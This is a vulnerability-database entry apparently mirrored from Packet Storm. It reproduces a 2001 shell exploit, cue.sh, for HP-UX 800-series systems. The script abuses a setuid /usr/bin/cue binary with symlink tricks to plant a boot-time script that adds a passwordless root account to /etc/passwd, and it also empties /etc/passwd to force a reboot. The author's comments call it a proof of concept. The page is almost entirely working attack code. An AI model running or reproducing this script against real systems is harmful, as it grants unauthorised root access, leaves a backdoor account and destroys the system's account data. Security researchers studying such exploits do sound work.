Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

cue.sh

๐Ÿ—“๏ธย 08 Jun 2001ย 00:00:00Reported byย Emilie ChangTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 20ย Views

Dangerous script for proof of concept. Requires careful code review before execution.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/ksh  
  
##  
## THIS IS A DANGEROUS SCRIPT !!! READ THE CODE PRIOR TO ./!  
##  
## This is just a proof of concept. Don't use for malicious  
## purpose. If ever you decide to run that script, please  
## read the code carefully before!  
##  
## Emilie Chang, 2001. Dedicated to Scriptors of Doom and HERT  
## people. Good job sweethearts.  
##  
## Old-styled exploit, tested on HPUX 10.20, model 899  
## Warning : /usr/bin/cue exists on HPUX 800 models only  
##  
## Let's test the model by the way...  
##  
  
MODEL=`/usr/bin/model | awk -F '/' '{print $2}'`  
export MODEL  
  
if [ $MODEL -lt 800 -o $MODEL -gt 899 ]  
then  
echo "Your host doesn't look like a HPuX 8** model, stopping now."  
exit  
fi  
  
##  
## Test whether /usr/bin/cue exists or not...  
##  
  
if [ ! -u /usr/bin/cue ]  
then  
echo "/usr/bin/cue doesn't exist or it's not setuid 0. Stopping now."  
exit  
fi  
  
##  
## Well you passed the above tests. Going on playing.  
## Creating a file within /etc/rc.config.d : It will  
## be executed at next reboot (which might happen  
## soon)  
##  
  
TTY=`tty | awk -F '/' '{print $3}'`  
export TTY  
  
TERM=whatevah  
export TERM  
  
umask 000  
ln -s /etc/rc.config.d/laninit IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## Inserting evil root account within /etc/passwd  
##  
  
echo "cp /tmp/passwd /etc/passwd" >> /etc/rc.config.d/laninit  
echo "echo \"nroot::0:3:n:/:/sbin/sh\" >> /etc/passwd" >> /etc/rc.config.d/laninit  
echo "rm /etc/rc.config.d/laninit" >> /etc/rc.config.d/laninit  
  
##  
## Now saving the passwd file, which we are about to empty  
##   
  
cp /etc/passwd /tmp/passwd  
  
##  
## passwd file destruction  
## (SOMEONE SET US UP THE BOMB !!)  
##  
  
rm IDMERROR.$TTY  
ln -s /etc/passwd IDMERROR.$TTY  
/usr/bin/cue > /dev/null 2> /dev/null  
  
##  
## *POOF*, now that the /etc/passwd file is emptied, admin  
## MUST reboot to get things done.  
##  
  
echo "Your nroot account will be created within /etc/passwd"  
echo "with no password. Remove it asap, it's just a proof"  
echo "of concept!"  
  
# The end.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Jun 2001 00:00Current
7.4High risk
Vulners AI Score7.4
dangerous scriptproof of conceptrisk assessmentsecurity vulnerabilityhpux model requirementexploit testing
20
.json
Report